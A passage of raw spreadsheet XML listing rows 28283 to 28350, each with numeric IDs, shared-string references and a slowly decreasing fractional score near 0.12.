      <c r="C28283" s="2" t="s">
        <v>27177</v>
      </c>
      <c r="D28283" s="2">
        <v>1.0</v>
      </c>
      <c r="E28283" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28283" s="2">
        <v>0.1229508196721311</v>
      </c>
    </row>
    <row r="28284" ht="15.75" customHeight="1">
      <c r="A28284" s="1">
        <v>26826.0</v>
      </c>
      <c r="B28284" s="2">
        <v>1.8847999E7</v>
      </c>
      <c r="C28284" s="2" t="s">
        <v>27178</v>
      </c>
      <c r="D28284" s="2">
        <v>1.0</v>
      </c>
      <c r="E28284" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28284" s="2">
        <v>0.1229508196721311</v>
      </c>
    </row>
    <row r="28285" ht="15.75" customHeight="1">
      <c r="A28285" s="1">
        <v>9150.0</v>
      </c>
      <c r="B28285" s="2">
        <v>5.5270371E7</v>
      </c>
      <c r="C28285" s="2" t="s">
        <v>27179</v>
      </c>
      <c r="D28285" s="2">
        <v>1.0</v>
      </c>
      <c r="E28285" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28285" s="2">
        <v>0.1227598566308244</v>
      </c>
    </row>
    <row r="28286" ht="15.75" customHeight="1">
      <c r="A28286" s="1">
        <v>17878.0</v>
      </c>
      <c r="B28286" s="2">
        <v>5.1034321E7</v>
      </c>
      <c r="C28286" s="2" t="s">
        <v>27180</v>
      </c>
      <c r="D28286" s="2">
        <v>1.0</v>
      </c>
      <c r="E28286" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28286" s="2">
        <v>0.1226851851851852</v>
      </c>
    </row>
    <row r="28287" ht="15.75" customHeight="1">
      <c r="A28287" s="1">
        <v>11835.0</v>
      </c>
      <c r="B28287" s="2">
        <v>2.4700372E7</v>
      </c>
      <c r="C28287" s="2" t="s">
        <v>27181</v>
      </c>
      <c r="D28287" s="2">
        <v>1.0</v>
      </c>
      <c r="E28287" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28287" s="2">
        <v>0.1226415094339623</v>
      </c>
    </row>
    <row r="28288" ht="15.75" customHeight="1">
      <c r="A28288" s="1">
        <v>7203.0</v>
      </c>
      <c r="B28288" s="2">
        <v>5.0596052E7</v>
      </c>
      <c r="C28288" s="2" t="s">
        <v>27182</v>
      </c>
      <c r="D28288" s="2">
        <v>1.0</v>
      </c>
      <c r="E28288" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28288" s="2">
        <v>0.1224279835390946</v>
      </c>
    </row>
    <row r="28289" ht="15.75" customHeight="1">
      <c r="A28289" s="1">
        <v>18661.0</v>
      </c>
      <c r="B28289" s="2">
        <v>5.3510853E7</v>
      </c>
      <c r="C28289" s="2" t="s">
        <v>27183</v>
      </c>
      <c r="D28289" s="2">
        <v>1.0</v>
      </c>
      <c r="E28289" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28289" s="2">
        <v>0.1224279835390946</v>
      </c>
    </row>
    <row r="28290" ht="15.75" customHeight="1">
      <c r="A28290" s="1">
        <v>19130.0</v>
      </c>
      <c r="B28290" s="2">
        <v>5.47653E7</v>
      </c>
      <c r="C28290" s="2" t="s">
        <v>27184</v>
      </c>
      <c r="D28290" s="2">
        <v>1.0</v>
      </c>
      <c r="E28290" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28290" s="2">
        <v>0.1224279835390946</v>
      </c>
    </row>
    <row r="28291" ht="15.75" customHeight="1">
      <c r="A28291" s="1">
        <v>8572.0</v>
      </c>
      <c r="B28291" s="2">
        <v>5.4197701E7</v>
      </c>
      <c r="C28291" s="2" t="s">
        <v>27185</v>
      </c>
      <c r="D28291" s="2">
        <v>1.0</v>
      </c>
      <c r="E28291" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28291" s="2">
        <v>0.1223958333333334</v>
      </c>
    </row>
    <row r="28292" ht="15.75" customHeight="1">
      <c r="A28292" s="1">
        <v>11341.0</v>
      </c>
      <c r="B28292" s="2">
        <v>2.1208418E7</v>
      </c>
      <c r="C28292" s="2" t="s">
        <v>27186</v>
      </c>
      <c r="D28292" s="2">
        <v>1.0</v>
      </c>
      <c r="E28292" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28292" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="28293" ht="15.75" customHeight="1">
      <c r="A28293" s="1">
        <v>13048.0</v>
      </c>
      <c r="B28293" s="2">
        <v>3.3153077E7</v>
      </c>
      <c r="C28293" s="2" t="s">
        <v>27187</v>
      </c>
      <c r="D28293" s="2">
        <v>1.0</v>
      </c>
      <c r="E28293" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28293" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="28294" ht="15.75" customHeight="1">
      <c r="A28294" s="1">
        <v>21136.0</v>
      </c>
      <c r="B28294" s="2">
        <v>1.8498654E7</v>
      </c>
      <c r="C28294" s="2" t="s">
        <v>27188</v>
      </c>
      <c r="D28294" s="2">
        <v>1.0</v>
      </c>
      <c r="E28294" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28294" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="28295" ht="15.75" customHeight="1">
      <c r="A28295" s="1">
        <v>25570.0</v>
      </c>
      <c r="B28295" s="2">
        <v>1.4329733E7</v>
      </c>
      <c r="C28295" s="2" t="s">
        <v>27189</v>
      </c>
      <c r="D28295" s="2">
        <v>1.0</v>
      </c>
      <c r="E28295" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28295" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="28296" ht="15.75" customHeight="1">
      <c r="A28296" s="1">
        <v>2294.0</v>
      </c>
      <c r="B28296" s="2">
        <v>3.2635377E7</v>
      </c>
      <c r="C28296" s="2" t="s">
        <v>27190</v>
      </c>
      <c r="D28296" s="2">
        <v>1.0</v>
      </c>
      <c r="E28296" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28296" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="28297" ht="15.75" customHeight="1">
      <c r="A28297" s="1">
        <v>12610.0</v>
      </c>
      <c r="B28297" s="2">
        <v>3.0156628E7</v>
      </c>
      <c r="C28297" s="2" t="s">
        <v>27191</v>
      </c>
      <c r="D28297" s="2">
        <v>1.0</v>
      </c>
      <c r="E28297" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28297" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="28298" ht="15.75" customHeight="1">
      <c r="A28298" s="1">
        <v>13045.0</v>
      </c>
      <c r="B28298" s="2">
        <v>3.3125291E7</v>
      </c>
      <c r="C28298" s="2" t="s">
        <v>27192</v>
      </c>
      <c r="D28298" s="2">
        <v>1.0</v>
      </c>
      <c r="E28298" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28298" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="28299" ht="15.75" customHeight="1">
      <c r="A28299" s="1">
        <v>14444.0</v>
      </c>
      <c r="B28299" s="2">
        <v>3.9353766E7</v>
      </c>
      <c r="C28299" s="2" t="s">
        <v>27193</v>
      </c>
      <c r="D28299" s="2">
        <v>1.0</v>
      </c>
      <c r="E28299" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28299" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="28300" ht="15.75" customHeight="1">
      <c r="A28300" s="1">
        <v>28224.0</v>
      </c>
      <c r="B28300" s="2">
        <v>2.5078535E7</v>
      </c>
      <c r="C28300" s="2" t="s">
        <v>27194</v>
      </c>
      <c r="D28300" s="2">
        <v>1.0</v>
      </c>
      <c r="E28300" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28300" s="2">
        <v>0.1218905472636816</v>
      </c>
    </row>
    <row r="28301" ht="15.75" customHeight="1">
      <c r="A28301" s="1">
        <v>4032.0</v>
      </c>
      <c r="B28301" s="2">
        <v>4.1008751E7</v>
      </c>
      <c r="C28301" s="2" t="s">
        <v>27195</v>
      </c>
      <c r="D28301" s="2">
        <v>1.0</v>
      </c>
      <c r="E28301" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28301" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="28302" ht="15.75" customHeight="1">
      <c r="A28302" s="1">
        <v>4792.0</v>
      </c>
      <c r="B28302" s="2">
        <v>4.3499817E7</v>
      </c>
      <c r="C28302" s="2" t="s">
        <v>27196</v>
      </c>
      <c r="D28302" s="2">
        <v>1.0</v>
      </c>
      <c r="E28302" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28302" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="28303" ht="15.75" customHeight="1">
      <c r="A28303" s="1">
        <v>6119.0</v>
      </c>
      <c r="B28303" s="2">
        <v>4.7783372E7</v>
      </c>
      <c r="C28303" s="2" t="s">
        <v>27197</v>
      </c>
      <c r="D28303" s="2">
        <v>1.0</v>
      </c>
      <c r="E28303" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28303" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="28304" ht="15.75" customHeight="1">
      <c r="A28304" s="1">
        <v>16906.0</v>
      </c>
      <c r="B28304" s="2">
        <v>4.8120457E7</v>
      </c>
      <c r="C28304" s="2" t="s">
        <v>27198</v>
      </c>
      <c r="D28304" s="2">
        <v>1.0</v>
      </c>
      <c r="E28304" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28304" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="28305" ht="15.75" customHeight="1">
      <c r="A28305" s="1">
        <v>29549.0</v>
      </c>
      <c r="B28305" s="2">
        <v>3.307476E7</v>
      </c>
      <c r="C28305" s="2" t="s">
        <v>27199</v>
      </c>
      <c r="D28305" s="2">
        <v>1.0</v>
      </c>
      <c r="E28305" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28305" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="28306" ht="15.75" customHeight="1">
      <c r="A28306" s="1">
        <v>32767.0</v>
      </c>
      <c r="B28306" s="2">
        <v>6075795.0</v>
      </c>
      <c r="C28306" s="2" t="s">
        <v>27200</v>
      </c>
      <c r="D28306" s="2">
        <v>1.0</v>
      </c>
      <c r="E28306" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28306" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="28307" ht="15.75" customHeight="1">
      <c r="A28307" s="1">
        <v>33259.0</v>
      </c>
      <c r="B28307" s="2">
        <v>7361667.0</v>
      </c>
      <c r="C28307" s="2" t="s">
        <v>27201</v>
      </c>
      <c r="D28307" s="2">
        <v>1.0</v>
      </c>
      <c r="E28307" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28307" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="28308" ht="15.75" customHeight="1">
      <c r="A28308" s="1">
        <v>3117.0</v>
      </c>
      <c r="B28308" s="2">
        <v>3.6803143E7</v>
      </c>
      <c r="C28308" s="2" t="s">
        <v>27202</v>
      </c>
      <c r="D28308" s="2">
        <v>1.0</v>
      </c>
      <c r="E28308" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28308" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="28309" ht="15.75" customHeight="1">
      <c r="A28309" s="1">
        <v>5800.0</v>
      </c>
      <c r="B28309" s="2">
        <v>4.6784675E7</v>
      </c>
      <c r="C28309" s="2" t="s">
        <v>27203</v>
      </c>
      <c r="D28309" s="2">
        <v>1.0</v>
      </c>
      <c r="E28309" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28309" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="28310" ht="15.75" customHeight="1">
      <c r="A28310" s="1">
        <v>13970.0</v>
      </c>
      <c r="B28310" s="2">
        <v>3.7332667E7</v>
      </c>
      <c r="C28310" s="2" t="s">
        <v>27204</v>
      </c>
      <c r="D28310" s="2">
        <v>1.0</v>
      </c>
      <c r="E28310" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28310" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="28311" ht="15.75" customHeight="1">
      <c r="A28311" s="1">
        <v>24243.0</v>
      </c>
      <c r="B28311" s="2">
        <v>1.0500348E7</v>
      </c>
      <c r="C28311" s="2" t="s">
        <v>27205</v>
      </c>
      <c r="D28311" s="2">
        <v>1.0</v>
      </c>
      <c r="E28311" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28311" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="28312" ht="15.75" customHeight="1">
      <c r="A28312" s="1">
        <v>30542.0</v>
      </c>
      <c r="B28312" s="2">
        <v>4.0578915E7</v>
      </c>
      <c r="C28312" s="2" t="s">
        <v>27206</v>
      </c>
      <c r="D28312" s="2">
        <v>1.0</v>
      </c>
      <c r="E28312" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28312" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="28313" ht="15.75" customHeight="1">
      <c r="A28313" s="1">
        <v>34152.0</v>
      </c>
      <c r="B28313" s="2">
        <v>9861010.0</v>
      </c>
      <c r="C28313" s="2" t="s">
        <v>27207</v>
      </c>
      <c r="D28313" s="2">
        <v>1.0</v>
      </c>
      <c r="E28313" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28313" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="28314" ht="15.75" customHeight="1">
      <c r="A28314" s="1">
        <v>5550.0</v>
      </c>
      <c r="B28314" s="2">
        <v>4.5943505E7</v>
      </c>
      <c r="C28314" s="2" t="s">
        <v>27208</v>
      </c>
      <c r="D28314" s="2">
        <v>1.0</v>
      </c>
      <c r="E28314" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28314" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="28315" ht="15.75" customHeight="1">
      <c r="A28315" s="1">
        <v>16121.0</v>
      </c>
      <c r="B28315" s="2">
        <v>4.5469361E7</v>
      </c>
      <c r="C28315" s="2" t="s">
        <v>27209</v>
      </c>
      <c r="D28315" s="2">
        <v>1.0</v>
      </c>
      <c r="E28315" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28315" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="28316" ht="15.75" customHeight="1">
      <c r="A28316" s="1">
        <v>16568.0</v>
      </c>
      <c r="B28316" s="2">
        <v>4.6868032E7</v>
      </c>
      <c r="C28316" s="2" t="s">
        <v>27210</v>
      </c>
      <c r="D28316" s="2">
        <v>1.0</v>
      </c>
      <c r="E28316" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28316" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="28317" ht="15.75" customHeight="1">
      <c r="A28317" s="1">
        <v>21517.0</v>
      </c>
      <c r="B28317" s="2">
        <v>2.3216933E7</v>
      </c>
      <c r="C28317" s="2" t="s">
        <v>27211</v>
      </c>
      <c r="D28317" s="2">
        <v>1.0</v>
      </c>
      <c r="E28317" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28317" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="28318" ht="15.75" customHeight="1">
      <c r="A28318" s="1">
        <v>24731.0</v>
      </c>
      <c r="B28318" s="2">
        <v>1.1753351E7</v>
      </c>
      <c r="C28318" s="2" t="s">
        <v>27212</v>
      </c>
      <c r="D28318" s="2">
        <v>1.0</v>
      </c>
      <c r="E28318" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28318" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="28319" ht="15.75" customHeight="1">
      <c r="A28319" s="1">
        <v>32859.0</v>
      </c>
      <c r="B28319" s="2">
        <v>6274051.0</v>
      </c>
      <c r="C28319" s="2" t="s">
        <v>27213</v>
      </c>
      <c r="D28319" s="2">
        <v>1.0</v>
      </c>
      <c r="E28319" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28319" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="28320" ht="15.75" customHeight="1">
      <c r="A28320" s="1">
        <v>1046.0</v>
      </c>
      <c r="B28320" s="2">
        <v>2.3342699E7</v>
      </c>
      <c r="C28320" s="2" t="s">
        <v>27214</v>
      </c>
      <c r="D28320" s="2">
        <v>1.0</v>
      </c>
      <c r="E28320" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28320" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="28321" ht="15.75" customHeight="1">
      <c r="A28321" s="1">
        <v>3330.0</v>
      </c>
      <c r="B28321" s="2">
        <v>3.7682621E7</v>
      </c>
      <c r="C28321" s="2" t="s">
        <v>27215</v>
      </c>
      <c r="D28321" s="2">
        <v>1.0</v>
      </c>
      <c r="E28321" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28321" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="28322" ht="15.75" customHeight="1">
      <c r="A28322" s="1">
        <v>6203.0</v>
      </c>
      <c r="B28322" s="2">
        <v>4.7974692E7</v>
      </c>
      <c r="C28322" s="2" t="s">
        <v>27216</v>
      </c>
      <c r="D28322" s="2">
        <v>1.0</v>
      </c>
      <c r="E28322" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28322" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="28323" ht="15.75" customHeight="1">
      <c r="A28323" s="1">
        <v>8104.0</v>
      </c>
      <c r="B28323" s="2">
        <v>5.3065106E7</v>
      </c>
      <c r="C28323" s="2" t="s">
        <v>27217</v>
      </c>
      <c r="D28323" s="2">
        <v>1.0</v>
      </c>
      <c r="E28323" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28323" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="28324" ht="15.75" customHeight="1">
      <c r="A28324" s="1">
        <v>8177.0</v>
      </c>
      <c r="B28324" s="2">
        <v>5.3237968E7</v>
      </c>
      <c r="C28324" s="2" t="s">
        <v>27218</v>
      </c>
      <c r="D28324" s="2">
        <v>1.0</v>
      </c>
      <c r="E28324" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28324" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="28325" ht="15.75" customHeight="1">
      <c r="A28325" s="1">
        <v>9933.0</v>
      </c>
      <c r="B28325" s="2">
        <v>5.6832868E7</v>
      </c>
      <c r="C28325" s="2" t="s">
        <v>27219</v>
      </c>
      <c r="D28325" s="2">
        <v>1.0</v>
      </c>
      <c r="E28325" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28325" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="28326" ht="15.75" customHeight="1">
      <c r="A28326" s="1">
        <v>10068.0</v>
      </c>
      <c r="B28326" s="2">
        <v>5.7141524E7</v>
      </c>
      <c r="C28326" s="2" t="s">
        <v>27220</v>
      </c>
      <c r="D28326" s="2">
        <v>1.0</v>
      </c>
      <c r="E28326" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28326" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="28327" ht="15.75" customHeight="1">
      <c r="A28327" s="1">
        <v>11270.0</v>
      </c>
      <c r="B28327" s="2">
        <v>2.0722892E7</v>
      </c>
      <c r="C28327" s="2" t="s">
        <v>27221</v>
      </c>
      <c r="D28327" s="2">
        <v>1.0</v>
      </c>
      <c r="E28327" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28327" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="28328" ht="15.75" customHeight="1">
      <c r="A28328" s="1">
        <v>13823.0</v>
      </c>
      <c r="B28328" s="2">
        <v>3.675251E7</v>
      </c>
      <c r="C28328" s="2" t="s">
        <v>27222</v>
      </c>
      <c r="D28328" s="2">
        <v>1.0</v>
      </c>
      <c r="E28328" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28328" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="28329" ht="15.75" customHeight="1">
      <c r="A28329" s="1">
        <v>15773.0</v>
      </c>
      <c r="B28329" s="2">
        <v>4.4184276E7</v>
      </c>
      <c r="C28329" s="2" t="s">
        <v>27223</v>
      </c>
      <c r="D28329" s="2">
        <v>1.0</v>
      </c>
      <c r="E28329" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28329" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="28330" ht="15.75" customHeight="1">
      <c r="A28330" s="1">
        <v>16076.0</v>
      </c>
      <c r="B28330" s="2">
        <v>4.5327034E7</v>
      </c>
      <c r="C28330" s="2" t="s">
        <v>27224</v>
      </c>
      <c r="D28330" s="2">
        <v>1.0</v>
      </c>
      <c r="E28330" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28330" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="28331" ht="15.75" customHeight="1">
      <c r="A28331" s="1">
        <v>16356.0</v>
      </c>
      <c r="B28331" s="2">
        <v>4.6107379E7</v>
      </c>
      <c r="C28331" s="2" t="s">
        <v>27225</v>
      </c>
      <c r="D28331" s="2">
        <v>1.0</v>
      </c>
      <c r="E28331" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28331" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="28332" ht="15.75" customHeight="1">
      <c r="A28332" s="1">
        <v>20025.0</v>
      </c>
      <c r="B28332" s="2">
        <v>6534119.0</v>
      </c>
      <c r="C28332" s="2" t="s">
        <v>27226</v>
      </c>
      <c r="D28332" s="2">
        <v>1.0</v>
      </c>
      <c r="E28332" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28332" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="28333" ht="15.75" customHeight="1">
      <c r="A28333" s="1">
        <v>23622.0</v>
      </c>
      <c r="B28333" s="2">
        <v>6515600.0</v>
      </c>
      <c r="C28333" s="2" t="s">
        <v>27227</v>
      </c>
      <c r="D28333" s="2">
        <v>1.0</v>
      </c>
      <c r="E28333" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28333" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="28334" ht="15.75" customHeight="1">
      <c r="A28334" s="1">
        <v>26317.0</v>
      </c>
      <c r="B28334" s="2">
        <v>1.6651976E7</v>
      </c>
      <c r="C28334" s="2" t="s">
        <v>27228</v>
      </c>
      <c r="D28334" s="2">
        <v>1.0</v>
      </c>
      <c r="E28334" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28334" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="28335" ht="15.75" customHeight="1">
      <c r="A28335" s="1">
        <v>28058.0</v>
      </c>
      <c r="B28335" s="2">
        <v>2.4573706E7</v>
      </c>
      <c r="C28335" s="2" t="s">
        <v>27229</v>
      </c>
      <c r="D28335" s="2">
        <v>1.0</v>
      </c>
      <c r="E28335" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28335" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="28336" ht="15.75" customHeight="1">
      <c r="A28336" s="1">
        <v>28537.0</v>
      </c>
      <c r="B28336" s="2">
        <v>2.6800223E7</v>
      </c>
      <c r="C28336" s="2" t="s">
        <v>27230</v>
      </c>
      <c r="D28336" s="2">
        <v>1.0</v>
      </c>
      <c r="E28336" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28336" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="28337" ht="15.75" customHeight="1">
      <c r="A28337" s="1">
        <v>29061.0</v>
      </c>
      <c r="B28337" s="2">
        <v>3.0256309E7</v>
      </c>
      <c r="C28337" s="2" t="s">
        <v>27231</v>
      </c>
      <c r="D28337" s="2">
        <v>1.0</v>
      </c>
      <c r="E28337" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28337" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="28338" ht="15.75" customHeight="1">
      <c r="A28338" s="1">
        <v>29276.0</v>
      </c>
      <c r="B28338" s="2">
        <v>3.0994721E7</v>
      </c>
      <c r="C28338" s="2" t="s">
        <v>27232</v>
      </c>
      <c r="D28338" s="2">
        <v>1.0</v>
      </c>
      <c r="E28338" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28338" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="28339" ht="15.75" customHeight="1">
      <c r="A28339" s="1">
        <v>29885.0</v>
      </c>
      <c r="B28339" s="2">
        <v>3607007.0</v>
      </c>
      <c r="C28339" s="2" t="s">
        <v>27233</v>
      </c>
      <c r="D28339" s="2">
        <v>1.0</v>
      </c>
      <c r="E28339" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28339" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="28340" ht="15.75" customHeight="1">
      <c r="A28340" s="1">
        <v>30127.0</v>
      </c>
      <c r="B28340" s="2">
        <v>3.6948835E7</v>
      </c>
      <c r="C28340" s="2" t="s">
        <v>27234</v>
      </c>
      <c r="D28340" s="2">
        <v>1.0</v>
      </c>
      <c r="E28340" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28340" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="28341" ht="15.75" customHeight="1">
      <c r="A28341" s="1">
        <v>30443.0</v>
      </c>
      <c r="B28341" s="2">
        <v>3.9214666E7</v>
      </c>
      <c r="C28341" s="2" t="s">
        <v>27235</v>
      </c>
      <c r="D28341" s="2">
        <v>1.0</v>
      </c>
      <c r="E28341" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28341" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="28342" ht="15.75" customHeight="1">
      <c r="A28342" s="1">
        <v>31455.0</v>
      </c>
      <c r="B28342" s="2">
        <v>5034640.0</v>
      </c>
      <c r="C28342" s="2" t="s">
        <v>27236</v>
      </c>
      <c r="D28342" s="2">
        <v>1.0</v>
      </c>
      <c r="E28342" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28342" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="28343" ht="15.75" customHeight="1">
      <c r="A28343" s="1">
        <v>31883.0</v>
      </c>
      <c r="B28343" s="2">
        <v>5.2866822E7</v>
      </c>
      <c r="C28343" s="2" t="s">
        <v>27237</v>
      </c>
      <c r="D28343" s="2">
        <v>1.0</v>
      </c>
      <c r="E28343" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28343" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="28344" ht="15.75" customHeight="1">
      <c r="A28344" s="1">
        <v>32318.0</v>
      </c>
      <c r="B28344" s="2">
        <v>5575500.0</v>
      </c>
      <c r="C28344" s="2" t="s">
        <v>27238</v>
      </c>
      <c r="D28344" s="2">
        <v>1.0</v>
      </c>
      <c r="E28344" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28344" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="28345" ht="15.75" customHeight="1">
      <c r="A28345" s="1">
        <v>15604.0</v>
      </c>
      <c r="B28345" s="2">
        <v>4.3500194E7</v>
      </c>
      <c r="C28345" s="2" t="s">
        <v>27239</v>
      </c>
      <c r="D28345" s="2">
        <v>1.0</v>
      </c>
      <c r="E28345" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28345" s="2">
        <v>0.1211293260473589</v>
      </c>
    </row>
    <row r="28346" ht="15.75" customHeight="1">
      <c r="A28346" s="1">
        <v>18678.0</v>
      </c>
      <c r="B28346" s="2">
        <v>5.3562022E7</v>
      </c>
      <c r="C28346" s="2" t="s">
        <v>27240</v>
      </c>
      <c r="D28346" s="2">
        <v>1.0</v>
      </c>
      <c r="E28346" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28346" s="2">
        <v>0.1209677419354839</v>
      </c>
    </row>
    <row r="28347" ht="15.75" customHeight="1">
      <c r="A28347" s="1">
        <v>3204.0</v>
      </c>
      <c r="B28347" s="2">
        <v>3.7277525E7</v>
      </c>
      <c r="C28347" s="2" t="s">
        <v>27241</v>
      </c>
      <c r="D28347" s="2">
        <v>1.0</v>
      </c>
      <c r="E28347" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28347" s="2">
        <v>0.1208112874779542</v>
      </c>
    </row>
    <row r="28348" ht="15.75" customHeight="1">
      <c r="A28348" s="1">
        <v>4207.0</v>
      </c>
      <c r="B28348" s="2">
        <v>4.1686985E7</v>
      </c>
      <c r="C28348" s="2" t="s">
        <v>27242</v>
      </c>
      <c r="D28348" s="2">
        <v>1.0</v>
      </c>
      <c r="E28348" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28348" s="2">
        <v>0.1208112874779542</v>
      </c>
    </row>
    <row r="28349" ht="15.75" customHeight="1">
      <c r="A28349" s="1">
        <v>24081.0</v>
      </c>
      <c r="B28349" s="2">
        <v>9710192.0</v>
      </c>
      <c r="C28349" s="2" t="s">
        <v>27243</v>
      </c>
      <c r="D28349" s="2">
        <v>1.0</v>
      </c>
      <c r="E28349" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28349" s="2">
        <v>0.1208112874779542</v>
      </c>
    </row>
    <row r="28350" ht="15.75" customHeight="1">
      <c r="A28350" s="1">
        <v>14102.0</v>
      </c>
      <c r="B28350" s="2">
        <v>3.7750307E7</v>
      </c>
      <c r="C28350" s="2" t="s">
